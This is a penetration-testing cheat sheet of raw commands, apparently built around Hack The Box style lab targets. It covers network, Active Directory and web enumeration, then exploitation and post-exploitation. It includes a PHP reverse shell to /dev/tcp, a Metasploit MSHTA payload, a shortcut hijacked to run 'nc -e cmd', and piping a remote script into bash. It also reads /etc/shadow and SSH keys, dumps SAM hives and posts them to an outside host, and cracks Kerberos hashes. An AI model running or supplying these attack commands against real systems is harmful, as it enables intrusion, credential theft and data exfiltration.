# Environment Variables
## export
export TARGET=10.10.10.175
export KRB5CCNAME='/home/user/VICTIM@dc01@EXAMPLE.COM.ccache'

# Host Discovery
## External
nmap -Pn "$TARGET" | grep -oP '(?<=report for )\S+' | tee external-ips ; \
for ip in $(cat external-ips); do nmap=$(nmap -p- --min-rate 5000 --open "$ip" | grep -E '/|PORT|report for' | sed '1d'); \
echo "$nmap"; ports=$(echo "$nmap" | sed -n 's|/.*||p' | paste -sd ','); \
echo "nmap -Pn $ip --min-rate 5000 -p$ports -sV -sC"; echo; done

## Internal
nmap -Pn "$TARGET" | grep -oP '(?<=report for )\S+' | tee internal-ips ; \
for ip in $(cat internal-ips); do nmap=$(nmap -p- --min-rate 5000 --open "$ip" | grep -E '/|PORT|report for' | sed '1d'); \
echo "$nmap"; ports=$(echo "$nmap" | sed -n 's|/.*||p' | paste -sd ','); \
echo "nmap -Pn $ip --min-rate 5000 -p$ports -sV -sC"; echo; done

# Service Enumeration
## Nmap Scripts
nmap -Pn -sC -sV "$TARGET" -p22,80,139,445

## LDAP
ldap=$(nmap --script "ldap* and not brute" -p 389 "$TARGET"); echo "$ldap"
ldapsearch -H ldap://"$TARGET" -x -s base namingcontexts
ldapsearch -H ldap://dc01.xxxxxx.xxx/ -D "xxxxxx\P.Rosa" -w 'Rosaisbest123' -b "" -s base "(objectClass=*)" | grep -v 'supported'
ldapsearch -H ldap://dc01.xxxxxx.xxx/ -D "xxxxxx\P.Rosa" -w 'Rosaisbest123' -b "DC=xxxxxx,DC=xxx" "(objectClass=*)" "*" | grep 'SAM' -B 4 -A 3

## Kerberos
impacket-getST -spn dc01 vintage.htb/'USERNAME':'PASSWORD'

nano /etc/krb5.conf
[libdefaults]
default_realm = VINTAGE.HTB
dns_lookup_kdc = true
dns_lookup_realm = false
[realms]
VINTAGE.HTB = {
    kdc = dc01.vintage.htb
    admin_server = dc01.vintage.htb
}
[domain_realm]
.vintage.htb = VINTAGE.HTB
vintage.htb = VINTAGE.HTB

export KRB5CCNAME='/home/me/USERNAME@dc01@VINTAGE.HTB.ccache'
kinit -c '/home/me/USERNAME@dc01@VINTAGE.HTB.ccache' 'USERNAME@VINTAGE.HTB'
klist

impacket-GetADUsers -dc-host dc01.vintage.htb -k vintage.htb/
impacket-GetNPUsers -usersfile usernames domain/ -dc-ip 172.16.1.10
impacket-GetUserSPNs -request-user "$objuser" -dc-ip 172.16.1.10 domain/username:password
impacket-GetUserSPNs -no-preauth "$user" -usersfile usernames -dc-host 172.16.1.10 domain/
impacket-GetUserSPNs -request -dc-ip 172.16.1.10 domain/username:password

## FTP
nxc ftp 172.16.1.10 --port 21 -u 'anonymous' -p 'anonymous' --ls
ftp 172.16.1.10
anonymous
anonymous
ls -a
binary
ascii

## SMB
impacket-samrdump 172.16.1.10
nxc smb 172.16.1.10 --port 445 -u usernames -p passwords --rid-brute 10000
nxc smb 172.16.1.10 --port 445 -u usernames -p passwords --shares
impacket-smbclient domain/'user':'password'@172.16.1.10
shares
use

## MySQL
mysql -h 172.16.1.10 -u root@localhost -e 'show databases;'

## NFS Mounts
for x in $(showmount -e 172.16.1.10 | awk '{print $1}' | grep -v 'Export')
    do mkdir -p "/dev/shm"/mnt"$x"
    sudo mount -t nfs 172.16.1.10:"$x" "/dev/shm"/mnt"$x" -o nolock
    tree -puga "/dev/shm"/mnt"$x"
done

# Web Enumeration
## Technology Discovery
whatweb http://10.10.110.100

## WAF Discovery
wafw00f http://10.10.110.100

## WordPress Discovery
wpscan --url http://10.10.110.100/wordpress --enumerate

## Directory Discovery
ffuf -u 'http://10.10.110.100/FUZZ' -t 400 -rate 10000 -e .php -v -recursion -mc 200,301 \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
2>/dev/null | grep -oP '(http.*)(?<!/)$'

## Directory Traversal
ffuf -u 'http://10.10.110.100/nav.php?page=FUZZ' -t 400 -rate 10000 -v -mc 200 \
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
2>/dev/null | grep -oP '(http.*)(?<!/)$'

## XSS + SSTI
<img src=x>'"${{7*7}}

## Subdomain Discovery
gobuster vhost --append-domain -u example.com -k -r -t200 -q \
-w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
| grep -oP '(?<=Found: )[^ ]+'

# Exploitation

## Reverse Shell Listeners
nc -lvnp 4444
msfconsole -q -x "use multi/handler; set LHOST 10.10.17.97; set LPORT 4444; run"

## Reverse Shells
<?php
    $lhost = "10.10.16.3";
    $lport = 4444;
    
    exec("bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'");
    $sock = fsockopen($lhost, $lport);
    if ($sock) {
        exec("sh <&3 >&3 2>&3");
        }
?>

## Upgrade TTY
python3 -c 'import pty; pty.spawn("/bin/bash")';
CTRL-Z
stty size;stty raw -echo;fg
export SHELL=bash;
export TERM=xterm-256color;
stty rows <num> columns <num>
reset

## Windows MSHTA - Metasploit
msfconsole -q -x "use exploit/windows/misc/hta_server; set LHOST 10.10.16.13; set SRVHOST 10.10.16.13; run"
mshta.exe http://10.10.16.13:8080/nZzLAD.hta
sessions -i 1

## RDP
xfreerdp /u:'bob' /p:'pass123' /v:'10.129.204.151' /tls-seclevel:0 /dynamic-resolution

# Post Exploitation 

## Linux
ssh user@xxxxxxxxx -i id_rsa -L 33060:localhost:33060
netstat -tuln
ls -la /opt
sudo -l
find / -perm /4000 2>/dev/null
grep -r -E 'conf' /var/www
cat ~/.ssh/id_rsa
cat /etc/shadow
curl xxxxxxxxxx:8088/linpeas.sh | bash

## Windows
[*] Enumeration
whoami /priv
wmic useraccount get name,sid
cd C:\users
tree /f
powershell -c "Set-ExecutionPolicy unrestricted"

[*] File Transfer
powershell -c "certutil -urlcache -f http://xxxxxxxxxx:8088/winpeas.exe C:\programdata\winpeas.exe"
powershell -c "certutil -urlcache -f http://xxxxxxxxxx:8088/nc.exe C:\programdata\nc.exe"

[*] Rubeus
Rubeus.exe kerberoast
nano hashes; cat hashes | awk '{$1=$1}1' | tr -d '\n' | tee hashes; john hashes -w=rockyou --format=krb5tgs
Rubeus.exe asreproast
nano hashes; cat hashes | awk '{$1=$1}1' | tr -d '\n' | tee hashes; john hashes -w=rockyou --format=krb5asrep

[*] evil-winrm
evil-winrm -i xxxxxxxxxx -u 'username' -p 'password'
evil-winrm -i xxxxxxxxxx -u 'username' -H 'hash'

[*] url / .lnk exploits
click.url
[InternetShortcut]
URL=C:\programdata\shell.bat

[Notepad.lnk - Inject Reverse Shell]
powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Common Applications\Notepad.lnk');$s.TargetPath='C:\Windows\System32\cmd.exe';$s.Arguments='/c \"C:\ProgramData\nc.exe xxxxxxxxxx xxxx -e cmd\"';$s.Save()"

[*] Metasploit
meterpreter > use priv
meterpreter > getsystem

[*] nxc
nxc winrm xxxxxxxxxx -u 'username' -p 'password' -x \
'
powershell -c rm *.SAV
powershell -c reg save HKLM\SYSTEM SYSTEM.SAV
powershell -c reg save HKLM\SAM SAM.SAV
powershell -c compress-archive *.SAV SAM.zip
powershell -c dir
iwr http://xxxxxxxxxx:xxxx -Method POST -InFile SAM.zip
'; unzip -o SAM.zip; \
impacket-secretsdump LOCAL -sam SAM.SAV -system SYSTEM.SAV

[*] Powerview
powershell -c "certutil -urlcache -f http://xxxxxxxxxx:8088/powerview.ps1 C:\programdata\powerview.ps1"
powershell Import-Module C:\programdata\powerview.ps1
Get-NetDomain
Get-LocalUser
Set-DomainObject -Identity USERNAME -SET @{serviceprincipalname='SET/SET'}; Get-DomainSPNTicket -spn SET/SET

[*] bloodhound-python
bloodhound-python -c all -u 'username' -p 'password' -d "$domain" -dc "$dc" -ns "$target"
bloodhound-python -c default -u 'username' -p 'password' -d "$domain" -dc "$dc" -ns "$target"

